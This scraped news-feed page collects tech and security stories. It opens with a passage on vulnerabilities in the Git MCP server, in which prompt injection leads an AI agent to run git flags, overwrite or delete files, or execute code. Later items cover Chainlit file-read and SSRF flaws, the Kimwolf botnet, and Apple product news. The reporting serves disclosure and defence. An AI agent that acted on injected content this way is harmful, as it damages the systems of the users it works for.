It isn’t known how many enterprise developers use mcp-server-git, the official Git MCP server maintained by Anthropic. Nor is it known how many also use Filesystem MCP Server.
Cyata researcher Yarden Porat first discovered that if a tool is called in mcp-server-git, the server will use the path it is given without validation, so an attacker could create a new git repository with malicious content that could be read by the LLM.
The second hole is in a parameter that gets passed directly to the git command line without sanitization. That means a threat actor can inject any git flag, including one that could overwrite a target file. Third, it was discovered that an attacker could also delete files. Finally, researchers found that attackers could use git’s smudge and clean filters to run code.
“All you have to know — and it depends on the agent you’re attacking — is how to get the [AI] agent to read something you control,” said Tal. “That is quite widespread. It’s a very wide attack surface.”
Related content: Top 10 MCP vulnerabilities
Cyata says defensive action not only means updating mcp-server-git to version 2025.12.18 or later, but also auditing which MCP servers run together. Combining Git + Filesystem increases the attack surface, the researchers say.
Admins should also monitor for unexpected .git directories in non-repository folders.
“Generally, it is very hard to protect against vulnerabilities in MCP servers,” said Tal. “Most assistant type agents don’t even let you sanitize parameters. Homegrown agents could include various prompt injection defenses, but none are fail-proof.”
Cyata says it informed Anthropic of the first problem through the bug reporting service HackerOne on June 24, 2025. It was marked by Anthropic as informative. After Cyata reported the prompt injection issue, Anthropic took another look, but it wasn’t until September 10 that the report was accepted. The new version of Git MCP Server was released December 18.
In an interview, Porat suggested there wasn’t much that infosec leaders or developers could have done between the discovery of the vulnerability and the release of the more secure version of Git MCP Server. A prompt injection attack would work on the unpatched version even in its most secure configuration, he said.
“You need guardrails around each [AI] agent and what it can do, what it can touch,” Tal added. “You need to also, if there is an incident, be able to look back at everything the agent did.”
The problem with MCP servers is that they give the LLM access to execute sensitive functions, commented Johannes Ullrich, dean of research at the SANS Institute. “How much of a problem this is depends on the particular features they have access to. But once an MCP server is configured, the LLM will use the content it receives to act on and execute code (in this case, in git).
“Sadly, it is very unlikely that this will be the last time we see a prompt injection in this system. There is no simple fix for prompt injections, and usually you are going to create band-aids to prevent specific exploits. For an MCP server like this, the best option is to restrict the data it operates on, so it uses only data from trusted sources, and the functionality it can access. Some fine-grained access control can be used to implement this.”
Tanya Janca, a Canadian-based secure coding trainer, said to mitigate potential issues, development teams using MCP should limit access and privileges for MCP servers — no root, read-only access, local access only — and only give users the least privileges they need. Admins should validate file paths completely, not just prefix matching, resolve symlinks properly and always perform careful input validation and use parameterized queries. 
View the full article

• 0 comments
• 35 views

CSOonline

January 21Jan 21

App Store and Apple TV Experiencing Outage

App Store and Apple TV Experiencing Outage

Apple's App Store, iTunes Store, and Apple TV service are experiencing an outage at the current time, according to Apple's System Status page.


Apple says that some users may be experiencing issues with the ‌App Store‌ and iTunes Store. Apple also says some users may be seeing intermittent issues with ‌Apple TV‌. The ‌Apple TV‌ Channels feature is down too, and users may be unable to access some services or make purchases.

The services have been having issues since 6:48 p.m. Eastern Time. We'll update this article when the outage resolves.
This article, "App Store and Apple TV Experiencing Outage" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 34 views

reporter

January 21Jan 21

Apple Can Still Offer a Key iPhone Privacy Feature in France, Says Judge

Apple Can Still Offer a Key iPhone Privacy Feature in France, Says Judge

A judge in Paris today decided not to suspend Apple's App Tracking Transparency privacy feature in France, according to the French newspaper La Tribune.


In a statement shared with the publication, Apple said it welcomed the court's decision and will continue to support strong privacy protections for users.

Last year, Apple was fined €150 million by France's competition regulator, after it determined that the company's decision to implement App Tracking Transparency was an abuse of market dominance. Specifically, the regulator said the feature unfairly disadvantaged both third-party app developers and advertisers.

Since the release of iOS 14.5 in April 2021, Apple has required apps to ask for permission before tracking a user's activity across other apps and websites for personalized advertising. If a user selects the "Ask App Not to Track" option, the app is unable to access the device's advertising identifier. The feature enhances user privacy, but some advertisers have complained that it has significantly impacted revenue.

Last year, Apple warned that it may be forced to stop offering App Tracking Transparency in the EU due to regulatory pressures in countries such as France, Italy, Germany, and Poland, and from the overarching European Commission. But, it appears that the feature will live on in France for now following Apple's victory today.Tag: App Tracking Transparency
This article, "Apple Can Still Offer a Key iPhone Privacy Feature in France, Says Judge" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 29 views

reporter

January 21Jan 21

Flaws in Chainlit AI dev framework expose servers to compromise

Flaws in Chainlit AI dev framework expose servers to compromise

Two vulnerabilities in popular AI development framework Chainlit could enable attackers to read arbitrary files and database content from servers. If left unpatched, the flaws could allow attackers to leak API keys and other secret tokens to facilitate lateral movement inside the organization’s infrastructure.
“These vulnerabilities can be triggered with no user interaction,” researchers from security firm Zafran said in a report on the Chainlit flaws. “Zafran confirmed the vulnerabilities in real-world, internet-facing applications operated by major enterprises.”
Chainlit is a Python-based package for building AI apps with chatbot interfaces. It handles authentication and offers integrations with various backend systems, databases, and cloud services. With over 5 million downloads in the past year from the Python Index (PyPI), Chainlit is often mentioned in tutorials for building user-facing interfaces for RAG systems and other LLM-powered apps.
The two vulnerabilities, tracked as CVE-2026-22218 and CVE-2026-22219, were fixed in version 2.9.4, released last month. The release notes at the time mentioned a “security vulnerability fix” but no other details until the advisory was released this week.
Arbitrary file reads through custom elements
The first vulnerability (CVE-2026-22218) is located in the framework’s Element class. In Chainlit, elements are pieces of content that can be attached to a message, for example images, PDF files, videos, audio files, and dataframes, among others.
The framework’s Element class also supports a custom type for displaying JavaScript XML (JSX) files inside a message. JSX files extend JavaScript’s syntax to display HTML and are commonly used by libraries such as React.
The Zafran researchers discovered that this custom element gives attackers control over all its properties, because it does not validate the fields. For example, if attackers send a custom element with the path property set to any file on the server, the file will be returned to the user session.
Because of this, the flaw allows attackers to read any arbitrary file from the server, plenty of which could include sensitive information. For example, the /proc/self/environ file is used to store environment variables, and these can contain API keys, credentials, internal file paths, database paths, tokens for AWS and other cloud services, and even CHAINLIT_AUTH_SECRET, a secret that’s used to sign authentication tokens when authentication is enabled.
On top of that, if LangChain is used as the orchestration layer behind Chainlit and caching is enabled, user prompts sent to the LLM and the corresponding responses are saved to a file called .chainlit/.langchain.db. This file stores prompts across users and tenants, so attackers could exfiltrate it periodically to obtain sensitive information. Zafran’s proof-of-concept exploit involved leaking this file.
Cross-site request forgery
The second vulnerability (CVE-2026-22218) uses the same custom element as an attack vector but exploits it in a different way, through the URL property. By setting this field, attackers can force the server to trigger a request to the specified URL to fetch its contents and save it in the database.
Chainlit uses PostgreSQL by default but can also use SQLAlchemy with different backends such as SQLite or cloud storage providers such as AWS S3 or Azure Blobs. By exploiting this vulnerability, attackers can trigger a cross-site request forgery (SSRF) to obtain credentials.
“If Chainlit is deployed on an AWS EC2 instance with IMDSv1 enabled, the SSRF vulnerability can be used to access http://169.254.169.254/latest/meta-data/iam/security-credentials/ and retrieve role endpoints, allowing lateral movement within the cloud account,” the researchers said.
By combining these two flaws, attackers can extract a lot of information and credentials but also the database itself or source code files from the application that might contain custom code.
“Once cloud credentials or IAM tokens are obtained from the server, the attacker is no longer limited to the application,” the researchers wrote in their report. “They gain access to the cloud environment behind it. Storage buckets, secrets managers, LLM, internal data, and other cloud resources may become accessible to an attacker.”
The Zafran report contains signatures for the Snort network intrusion detection system and for the Cloudflare web application firewall, which can be used to block attack attempts until the applications are updated to a patched Chainlit version.
View the full article

• 0 comments
• 33 views

CSOonline

January 21Jan 21

Apple Fitness+ Expands to Japan

Apple Fitness+ Expands to Japan

Apple Fitness+ is now available in Japan, according to Japanese site Mac Otakara. Apple users who open the Fitness app on the iPhone will see the Apple Fitness+ tab available starting today.


Apple is providing users with a 1-month free trial, and after that, the service is priced at 980 yen per month or 7,800 yen per year. Japanese users do not have access to an Apple One plan that includes Apple Fitness+, as Apple does not provide a Premier plan in the country.

Apple said back in December that Apple Fitness+ would expand to Japan in early 2026. The service also recently became available in 28 new markets, including Hong Kong, India, the Netherlands, Singapore, and Taiwan.

Fitness+ workouts and meditations are digitally dubbed with a generated voice in Japanese, with more dubbed episodes added on a weekly basis. Apple also provides workouts in English or with Spanish and German dubbing. Digital dubbing requires iOS 26.1, iPadOS 26.1, and tvOS 26.1.

With the addition of Japan, users in 49 countries and regions around the world are able to access the Apple Fitness+ service. There are 12 different workout types available, such as strength, yoga, HIIT, pilates, dance, cycling, kickboxing, and meditation.

Workouts can be done using the ‌iPhone‌, iPad, and Apple TV. When Fitness+ is used with an Apple Watch or AirPods Pro 3, personalized metrics like heart rate, calories burned, and activity progress are displayed on the ‌iPhone‌, ‌iPad‌, or ‌Apple TV‌ screen.Tag: Apple Fitness Plus
This article, "Apple Fitness+ Expands to Japan" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 33 views

reporter

January 20Jan 20

Apple's Next iPhone: What to Expect From the 2026 iPhone 17e

Apple's Next iPhone: What to Expect From the 2026 iPhone 17e

We're likely just weeks away from Apple's next iPhone launch, with the company set to introduce the ‌iPhone‌ 17e. The ‌iPhone‌ 17e is a follow-up to the iPhone 16e that came out in February 2025, and rumors suggest that it could have some welcome improvements.


Design

The ‌iPhone‌ 17e is supposedly going to look a lot like the ‌iPhone 16e‌, featuring the same 6.1-inch display size, single-lens rear camera, and black and white color options.

While the display isn't changing much, the device could have a Dynamic Island instead of a notch, which would be a marked visual difference.

Display

The ‌iPhone‌ 17e is expected to feature the same display panel as the ‌iPhone 16e‌, which means it will be limited to a 60Hz refresh rate. Apple brought 120Hz ProMotion refresh rates to the standard iPhone 17 in 2025, but the same technology is not expected for the more affordable ‌iPhone‌ 17e.

120Hz refresh rates provide video improvements and smoother scrolling when viewing webpages.

The ‌iPhone 16e‌ does not have always-on display technology, and that's not likely to change with the ‌iPhone‌ 17e. To support always-on, the ‌iPhone‌ 17e would need an OLED display with 1-nit minimum brightness, which is limited to Apple's more expensive iPhones. HDR and brightness are also lacking compared to Apple's flagship lineup.

Though the display isn't changing, there have been rumors suggesting Apple could shrink the bezel size somewhat, allowing for more visible display area.

Dynamic Island

The ‌iPhone 16e‌ continues to feature the notch that Apple has eliminated in its newer flagship iPhones, but the ‌iPhone‌ 17e might do away with it. Rumors suggest that the ‌iPhone‌ 17e will have a ‌Dynamic Island‌ instead of a notch, giving it a more modern look.


The ‌Dynamic Island‌ is a pill-shaped cutout on the ‌iPhone‌'s display that houses the TrueDepth camera system and the front-facing camera. It takes up less display area than the notch, and it is better integrated into the ‌iPhone‌.

Apple uses software to change the size and shape of the ‌Dynamic Island‌ to accommodate alerts, notifications, and Live Activities. The ‌Dynamic Island‌ can show everything from Apple Maps turn-by-turn directions to active timers, incoming phone calls, and Face ID activations. It also displays privacy indicators for the microphone or camera, alerts when accessories connect, and indicators for the flashlight, screen recording, incoming AirDrop files, and more.

The ‌Dynamic Island‌ is much more interactive and useful than the notch, because there is an option to tap into the ‌Dynamic Island‌ to access different app features.

One rumor suggests the ‌iPhone‌ 17e will continue to use a notch, so the ‌Dynamic Island‌ upgrade isn't a guarantee.

A19 Chip

The ‌iPhone‌ 17e is expected to use Apple's A19 chip, which was first introduced in the ‌iPhone 17‌. The A19 chip is built using Apple's upgraded N3P 3-nanometer process, offering a 5 to 10 percent performance improvement over the A18 chip.

Apple could be planning to use a downclocked version of the A19 chip in the ‌iPhone‌ 17e, and if that's the case, its performance won't quite match the ‌iPhone 17‌'s performance.

The A18 chip that Apple used in the ‌iPhone 16e‌ had a 4-core GPU instead of a 5-core GPU like the version from the iPhone 16, so the ‌iPhone‌ 17e could get a similar GPU downgrade.

Aside from the improved CPU and GPU, the A19 has an updated display engine, image signal processor, and Neural Engine for improved AI performance. Every GPU core features a Neural Accelerator to boost the performance of local AI models.

We are expecting the ‌iPhone‌ 17e to continue to include 8GB RAM like the ‌iPhone 16e‌. Apple's other models have 12GB.

MagSafe Compatibility

The ‌iPhone 16e‌ does not have a magnetic ring for MagSafe charging, but the ‌iPhone‌ 17e could feature ‌MagSafe‌ compatibility. Rumors suggest the ‌iPhone‌ 17e will support magnetic wireless charging, which would be a major upgrade over the ‌iPhone 16e‌.

Apple's iPhones have used ‌MagSafe‌ since the ‌iPhone‌ 12, so there are a wide array of ‌MagSafe‌ cases and accessories. The ‌iPhone 16e‌ is not compatible with these accessories, which is a major limitation.

Since it doesn't have ‌MagSafe‌, the ‌iPhone 16e‌ is limited to 7.5W wireless charging speeds. ‌MagSafe‌ would upgrade that to at least 15W. The current ‌iPhone 17‌ models can charge at 25W over ‌MagSafe‌, though the iPhone Air is limited to 20W.

Camera

The ‌iPhone‌ 17e is expected to have a single 48-megapixel Wide Angle camera at the back, with no upgrade rumored. The ‌iPhone 16e‌ doesn't have a Camera Control button, and there's no word on whether Apple will bring it to the ‌iPhone‌ 17e.

The ‌iPhone 17‌ models got an upgraded 18-megapixel Center Stage front-facing camera, but rumors suggest the ‌iPhone‌ 17e will continue to use the same 12-megapixel front-facing camera as the ‌iPhone 16e‌.

Modem

The ‌iPhone‌ 17e will adopt Apple's C1X modem, the modem chip that Apple first debuted in the ‌iPhone Air‌. The C1X modem is faster and more efficient than the C1 modem that Apple used in the ‌iPhone 16e‌.

Apple says the C1X modem is up to 2x faster than the C1, and it is far more energy efficient than Qualcomm modems.

No N1 Chip

While the ‌iPhone 17‌ models received Apple's new Wi-Fi and Bluetooth "N1" networking chip, leaked Apple code suggests the chip will not be included in the ‌iPhone‌ 17e in order to keep costs down.

Pricing

The ‌iPhone 16e‌ is priced starting at $599, and no price changes are expected for the ‌iPhone‌ 17e.

Launch Date

Rumors suggest that the ‌iPhone‌ 17e is going to come in the first half of 2026, and Apple could stick to the February release timing. The ‌iPhone 16e‌ was introduced via press release on February 19, 2025, so we're probably not waiting on an event for the 17e.

For that reason, it could come anytime in February, though there's also a possibility that Apple will hold it until the March or April timeframe. In late March or early April, Apple plans to release iOS 26.4 with a new version of Siri, along with several updated home products.
This article, "Apple's Next iPhone: What to Expect From the 2026 iPhone 17e" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 35 views

reporter

January 20Jan 20

Airlock Digital Announces Independent TEI Study Quantifying Measurable ROI & Security Impact

Airlock Digital Announces Independent TEI Study Quantifying Measurable ROI & Security Impact

Airlock Digital, a leader in proactive application control and endpoint security, announced the release of The Total Economic Impact (TEI) of Airlock Digital, an independent study commissioned by Airlock Digital and conducted by Forrester Consulting. The study demonstrates a significant 224% return on investment (ROI) and a $3.8 million net present value (NPV) over three years for organizations adopting Airlock Digital’s allowlisting approach. These findings underline both the financial and security value of Airlock Digital’s solution.
Cyber NewsWire
Forrester’s TEI methodology evaluates the potential financial impact of technology investments by aggregating insights from customer interviews and modeling a composite organization representative of global organizations. According to the study, Airlock Digital enabled:
224% ROI over three years $3.8M net present value based on quantified benefits versus costs >25% reduction in overall risk of security breaches Zero breaches reported by interviewed organizations after deploying Airlock Digital Significant operational efficiencies with reduced administrative overhead David Cottingham, Co-founder and CEO at Airlock Digital, said: “For modern enterprises, trust cannot be assumed… it must be enforced. Allowlisting and application control give organizations the power to run only what they trust, blocking all malware and ransomware before they can execute. For us, the Forrester Consulting TEI study reinforces the importance of our mission at Airlock Digital, which is to deliver proactive endpoint security that makes application control not just possible, but effortless. It’s why we have become synonymous with this critical layer of cyber defense—and why every organization needs it at the core of their security strategy.”
As cyberattacks continue to grow in scale and sophistication, more organizations are turning to application control and allowlisting as foundational components of a proactive security strategy. Traditional reactive security tools attempt to detect and block threats after execution attempts are made—often too late to prevent compromise. Allowlisting reverses this paradigm, enforcing a Deny by Default posture that ensures only trusted and approved software is permitted to run. This approach dramatically reduces the attack surface, curbs the spread of malware and ransomware, and helps organizations meet increasingly stringent regulatory and compliance requirements. Airlock Digital’s modern, operationally friendly implementation of allowlisting enables security teams to adopt this strategy without the administrative complexity historically associated with legacy tools.
The study highlights that Airlock Digital helps organizations strengthen their security posture, lower ongoing maintenance costs, and improve software inventory management while keeping operational and administrative burden low. The study noted that a single security analyst can effectively manage Airlock Digital policies in much less time than traditional solutions require, contributing to cost savings and improved productivity.
Patrick Dillon, CRO at Airlock Digital said: “The Forrester Consulting TEI study gives security leaders, in our opinion, clear, independent validation of the impact delivered by Airlock Digital. Forrester Consulting calculated the benefits to include a 224% ROI and fast payback — and most importantly — participating organizations reported zero breaches after implementation. Airlock Digital combines simplicity with enterprise-grade scale, enforcing a Deny by Default posture that blocks untrusted code, including malware and ransomware. For organizations ready to move from reactive defenses to proactive prevention, Airlock Digital provides a quantified and operationally efficient path forward — requiring, according to the Forrester Consulting study, only 2.5 hours per week to manage. We’d be glad to walk you through the findings.”
About Airlock Digital
Airlock Digital delivers market-leading allowlisting and application control solutions that empower enterprises to enforce a Deny by Default security posture. Trusted globally across industries, Airlock Digital enables organizations to prevent unauthorized code execution, simplify compliance, and strengthen cyber-resilience without sacrificing performance or user productivity. This approach minimizes attack surfaces and helps organizations align their cybersecurity strategies with government frameworks and standards.
Users can download the full Forrester TEI study: https://www.airlockdigital.com/forrester-tei-report

Contact
VP of Marketing
Erin Welke
Airlock Digital
[email protected]

View the full article

• 0 comments
• 38 views

CSOonline

January 20Jan 20

Apple Releases New Firmware for iPad Pro and iPad Air Magic Keyboards

Apple Releases New Firmware for iPad Pro and iPad Air Magic Keyboards

Apple today released new firmware for the Magic Keyboards designed for the iPad Pro and iPad Air. The firmware for the M4/M5 ‌iPad Pro‌ model has a version number of 1872.544.772, up from the prior 0680.0220.0301 firmware, while the firmware for the M3 ‌iPad Air‌ model has a version number of 1024.320.771, up from 0350.0135.0303.


The new firmware is available for both the 11-inch and 13-inch ‌iPad Pro‌ Magic Keyboard options that Apple sells for the M4 and M5 ‌iPad Pro‌ models, as well as the version that Apple sells for the M3 ‌iPad Air‌.

Apple overhauled the Magic Keyboard in May 2024 alongside the launch of the M4 ‌iPad Pro‌. The updated keyboard has the same floating cantilevered design as the prior version, but it includes a dedicated row of function keys, along with a larger glass trackpad.

Magic Keyboard firmware updates are infrequent, and there is no method for manually refreshing the software. New firmware is installed automatically when the keyboard is attached to an ‌iPad Pro‌ that is connected to the internet.

You can check the firmware version of your Magic Keyboard by opening up the Settings app and going to General > About > Magic Keyboard.Tag: Magic Keyboard
This article, "Apple Releases New Firmware for iPad Pro and iPad Air Magic Keyboards" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 29 views

reporter

January 20Jan 20

Nomad Launches Hybrid Titanium Apple Watch Band in New 'Icy Blue Glow' Color

Nomad Launches Hybrid Titanium Apple Watch Band in New 'Icy Blue Glow' Color

Nomad today introduced a new version of its popular titanium Stratos band that's designed for the Apple Watch. The new version features a limited edition icy blue glow colorway, providing a subtle glow-in-the-dark effect that can be seen between the titanium links of the band.


Available for $189, the Stratos Apple Watch band combines the look of titanium with the comfort of fluoroelastomer. The band features outer links made from metal injection molded Grade 4 titanium, paired with molded FKM material on the interior.


The fluoroelastomer connects each titanium link, offering flexibility and comfort that's unavailable with traditional metal bands, including Apple's own titanium band. The FKM material peeks through the rounded titanium links, adding visual interest and space for ventilation to bolster moisture evaporation and breathability.


Nomad makes the Stratos band in Silver and Black titanium, with black, ultra orange, volt, and icy blue glow FKM color options. The latter is the new color, and we were able to try out the band before it launched. Nomad's imagery largely depicts the band in the dark with a rich, blue glow coming from the fluoroelastomer underlayer, but the actual blue shade in the light is much subtler. The color is a soft, muted blue that's close to white from a distance.

Exposing the band to sunlight or bright light produces a glow effect, but it's faint. The FKM material of the Stratos band is beneath the titanium and against the wrist, so it sees little light exposure. Light is needed for the glow to work, which means the overall result is subdued. For the most part, expect the band to look more white than blue between the links, but you will see thin lines of the blue color peeking through the links in the dark.


The band is comfortable on the wrist, and it's simple to remove links with the included tool to get a custom fit. The magnetic clasp is easy to close, and it only opens when squeezing the sides of the buckle, so it should remain secure. The clasp can pinch the skin when it's being closed, so be wary of that when putting the band on.


Having the fluoroelastomer underneath the titanium makes for a softer feel on the wrist than just titanium alone, and Nomad's band options are far cheaper than Apple's similar bands.

You can order the Icy Blue Glow Stratos Band from the Nomad website for $189.Tag: Nomad
This article, "Nomad Launches Hybrid Titanium Apple Watch Band in New 'Icy Blue Glow' Color" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 33 views

reporter

January 20Jan 20

North Korea-Linked Hackers Target Developers via Malicious VS Code Projects

North Korea-Linked Hackers Target Developers via Malicious VS Code Projects

The North Korean threat actors associated with the long-running Contagious Interview campaign have been observed using malicious Microsoft Visual Studio Code (VS Code) projects as lures to deliver a backdoor on compromised endpoints. The latest finding demonstrates continued evolution of the new tactic that was first discovered in December 2025, Jamf Threat Labs said. "This activity involvedView the full article

• 0 comments
• 39 views

Hacker News

January 20Jan 20

Kimwolf Botnet Lurking in Corporate, Govt. Networks

Kimwolf Botnet Lurking in Corporate, Govt. Networks

A new Internet-of-Things (IoT) botnet called Kimwolf has spread to more than 2 million devices, forcing infected systems to participate in massive distributed denial-of-service (DDoS) attacks and to relay other malicious and abusive Internet traffic. Kimwolf’s ability to scan the local networks of compromised systems for other IoT devices to infect makes it a sobering threat to organizations, and new research reveals Kimwolf is surprisingly prevalent in government and corporate networks.
Image: Shutterstock, @Elzicon.
Kimwolf grew rapidly in the waning months of 2025 by tricking various “residential proxy” services into relaying malicious commands to devices on the local networks of those proxy endpoints. Residential proxies are sold as a way to anonymize and localize one’s Web traffic to a specific region, and the biggest of these services allow customers to route their Internet activity through devices in virtually any country or city around the globe.
The malware that turns one’s Internet connection into a proxy node is often quietly bundled with various mobile apps and games, and it typically forces the infected device to relay malicious and abusive traffic — including ad fraud, account takeover attempts, and mass content-scraping.
Kimwolf mainly targeted proxies from IPIDEA, a Chinese service that has millions of proxy endpoints for rent on any given week. The Kimwolf operators discovered they could forward malicious commands to the internal networks of IPIDEA proxy endpoints, and then programmatically scan for and infect other vulnerable devices on each endpoint’s local network.
Most of the systems compromised through Kimwolf’s local network scanning have been unofficial Android TV streaming boxes. These are typically Android Open Source Project devices — not Android TV OS devices or Play Protect certified Android devices — and they are generally marketed as a way to watch unlimited (read:pirated) video content from popular subscription streaming services for a one-time fee.
However, a great many of these TV boxes ship to consumers with residential proxy software pre-installed. What’s more, they have no real security or authentication built-in: If you can communicate directly with the TV box, you can also easily compromise it with malware.
While IPIDEA and other affected proxy providers recently have taken steps to block threats like Kimwolf from going upstream into their endpoints (reportedly with varying degrees of success), the Kimwolf malware remains on millions of infected devices.
A screenshot of IPIDEA’s proxy service.
Kimwolf’s close association with residential proxy networks and compromised Android TV boxes might suggest we’d find relatively few infections on corporate networks. However, the security firm Infoblox said a recent review of its customer traffic found nearly 25 percent of them made a query to a Kimwolf-related domain name since October 1, 2025, when the botnet first showed signs of life.
Infoblox found the affected customers are based all over the world and in a wide range of industry verticals, from education and healthcare to government and finance.
“To be clear, this suggests that nearly 25% of customers had at least one device that was an endpoint in a residential proxy service targeted by Kimwolf operators,” Infoblox explained. “Such a device, maybe a phone or a laptop, was essentially co-opted by the threat actor to probe the local network for vulnerable devices. A query means a scan was made, not that new devices were compromised. Lateral movement would fail if there were no vulnerable devices to be found or if the DNS resolution was blocked.”
Synthient, a startup that tracks proxy services and was the first to disclose on January 2 the unique methods Kimwolf uses to spread, found proxy endpoints from IPIDEA were present in alarming numbers at government and academic institutions worldwide. Synthient said it spied at least 33,000 affected Internet addresses at universities and colleges, and nearly 8,000 IPIDEA proxies within various U.S. and foreign government networks.
The top 50 domain names sought out by users of IPIDEA’s residential proxy service, according to Synthient.
In a webinar on January 16, experts at the proxy tracking service Spur profiled Internet addresses associated with IPIDEA and 10 other proxy services that were thought to be vulnerable to Kimwolf’s tricks. Spur found residential proxies in nearly 300 government owned and operated networks, 318 utility companies, 166 healthcare companies or hospitals, and 141 companies in banking and finance.
“I looked at the 298 [government] owned and operated [networks], and so many of them were DoD [U.S. Department of Defense], which is kind of terrifying that DoD has IPIDEA and these other proxy services located inside of it,” Spur Co-Founder Riley Kilmer said. “I don’t know how these enterprises have these networks set up. It could be that [infected devices] are segregated on the network, that even if you had local access it doesn’t really mean much. However, it’s something to be aware of. If a device goes in, anything that device has access to the proxy would have access to.”
Kilmer said Kimwolf demonstrates how a single residential proxy infection can quickly lead to bigger problems for organizations that are harboring unsecured devices behind their firewalls, noting that proxy services present a potentially simple way for attackers to probe other devices on the local network of a targeted organization.
“If you know you have [proxy] infections that are located in a company, you can chose that [network] to come out of and then locally pivot,” Kilmer said. “If you have an idea of where to start or look, now you have a foothold in a company or an enterprise based on just that.”
This is the third story in our series on the Kimwolf botnet. Next week, we’ll shed light on the myriad China-based individuals and companies connected to the Badbox 2.0 botnet, the collective name given to a vast number of Android TV streaming box models that ship with no discernible security or authentication built-in, and with residential proxy malware pre-installed.
Further reading:
The Kimwolf Botnet is Stalking Your Local Network
Who Benefitted from the Aisuru and Kimwolf Botnets?
A Broken System Fueling Botnets (Synthient).
View the full article

• 0 comments
• 63 views

Krebs

January 20Jan 20

New, Higher End AirPods Pro Coming This Year

New, Higher End AirPods Pro Coming This Year

Apple is planning to debut a high-end secondary version of AirPods Pro 3 this year, sitting in the lineup alongside the current model, reports suggest.


Back in September 2025, supply chain analyst Ming-Chi Kuo reported that Apple is planning to introduce a successor to the ‌AirPods Pro 3‌ in 2026. This would be somewhat unusual since Apple normally waits around three years to make major changes to the AirPods' hardware. AirPods Pro 2 debuted at the iPhone 14 event in September 2022, and they were updated with a USB-C charging case and a few other tweaks in September 2023. Otherwise, Apple has waited about three years to update all of its AirPods models.

Kuo said that the 2026 AirPods Pro will feature a "more significant" hardware upgrade in the form at least one tiny infrared camera. He previously said AirPods with infrared cameras could recognize hand gestures and provide an enhanced spatial audio experience with Apple's Vision Pro headset.

The Chinese leaker known as "Instant Digital" subsequently corroborated the rumor with some additional details and clarifications. Rather than being a new generation, the 2026 AirPods Pro will apparently be a pricier, high-end variant of the ‌AirPods Pro 3‌ introduced in 2025, suggesting that both models will ultimately be on sale alongside each other. It is worth noting that Apple offers two version of the AirPods 4 at $129 and $179 price points, so this is a highly plausible move.

The current AirPods lineup has offerings priced at $129, $179, $249, and $549. An additional product between the $249 ‌AirPods Pro 3‌ and $549 AirPods Max seems possible, especially given the rise of higher end Bluetooth earbuds from the likes of Bang Olufsen, Bowers & Wilkins, and Bose.

As Kuo first said, Instant Digital similarly believes that the key differentiator will be an infrared camera for gesture controls. In fact, Apple may remove the high-end model's pressure-sensors and go all-in on gesture controls.

The H3 chip is also a possibility. According to Bloomberg's Mark Gurman, the next-generation audio chip is in development. The ‌AirPods Pro 3‌ launched last year stuck with the same H2 chip from their predecessor released in 2022.

Launch timing is currently unclear, but Apple typically announces new AirPods in the second half of the year. The original AirPods, AirPods Pro 2 and their subsequent USB-C revision, ‌AirPods 4‌, and ‌AirPods Pro 3‌ were all announced at Apple's annual ‌iPhone‌ event in September.
This article, "New, Higher End AirPods Pro Coming This Year" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 33 views

reporter

January 20Jan 20

Latest iPhone 18 Pro Leak Corroborated by Respected Former Analyst

Latest iPhone 18 Pro Leak Corroborated by Respected Former Analyst

Respected veteran display analyst Ross Young has added his support to a new leak today about the iPhone 18 Pro's front-panel design.


In a new post on X (Twitter), the now-retired Counterpoint Research VP said that Chinese leaker Instant Digital's latest explanation of how Apple will shrink the Dynamic Island is what he was alluding to in a report last year.

Back in June 2025, Young said that while some parts of Apple's Face ID system would move under the display on iPhone 18 Pro models, the devices would retain visible Face ID elements – meaning the Dynamic Island would persist, albeit in a smaller form than on the iPhone 14 Pro through iPhone 17 Pro.

That's effectively what Instant Digital claimed earlier today: the leaker explained that only the IR flood illuminator would move under the display to the top-left corner, while the dot projector, infrared camera, and selfie camera would remain housed in a reduced, centered Dynamic Island. Another Chinese leaker has since backed the claim, which also corresponds to reporting last year by Bloomberg's Mark Gurman.

Young's corroboration directly contradicts a recent report by The Information's Wayne Ma that said Apple would move the selfie camera to the top-left corner of the iPhone 18 Pro's display, resulting in a hole-punch cutout and the removal of the pill-shaped Dynamic Island.

It seems increasingly likely that details from Ma's sources were either lost in translation or misinterpreted, possibly due to partial knowledge of an under-display Face ID component.

Apple is expected to unveil the iPhone 18 Pro models in September.Related Roundup: iPhone 18Tag: Ross YoungRelated Forum: iPhone
This article, "Latest iPhone 18 Pro Leak Corroborated by Respected Former Analyst" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 34 views

reporter

January 20Jan 20

Amazon Takes Up to $174 Off Apple's M5 MacBook Pro

Amazon Takes Up to $174 Off Apple's M5 MacBook Pro

Amazon today has dropped the price of the new M5 MacBook Pro to $1,449.00, down from $1,599.00. This is the 10-Core model with 16GB RAM and 512GB SSD, and it's a solid second-best price on the M5 MacBook Pro.

Note: MacRumors is an affiliate partner with some of these vendors. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

Additionally, the 16GB RAM/1TB M5 MacBook Pro is available for $1,629.00 ($170 off) and the 24GB RAM/1TB M5 MacBook Pro has hit $1,825.00 on Amazon ($174 off). All three models have estimated delivery dates around January 25.

$150 OFF14-inch M5 MacBook Pro (16GB RAM/512GB) for $1,449.00
$170 OFF14-inch M5 MacBook Pro (16GB RAM/1TB) for $1,629.00
$174 OFF14-inch M5 MacBook Pro (24GB RAM/1TB) for $1,825.00


This version of the MacBook Pro launched in October and it comes with the newest M5 chip, which offers up to 15% faster CPU performance and up to 45% faster graphics when compared to the M4 chip. If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.



Deals Newsletter

Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!




Related Roundup: Apple Deals
This article, "Amazon Takes Up to $174 Off Apple's M5 MacBook Pro" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 36 views

reporter

January 20Jan 20

Apple Regains Top Spot in China's Smartphone Market

Apple Regains Top Spot in China's Smartphone Market

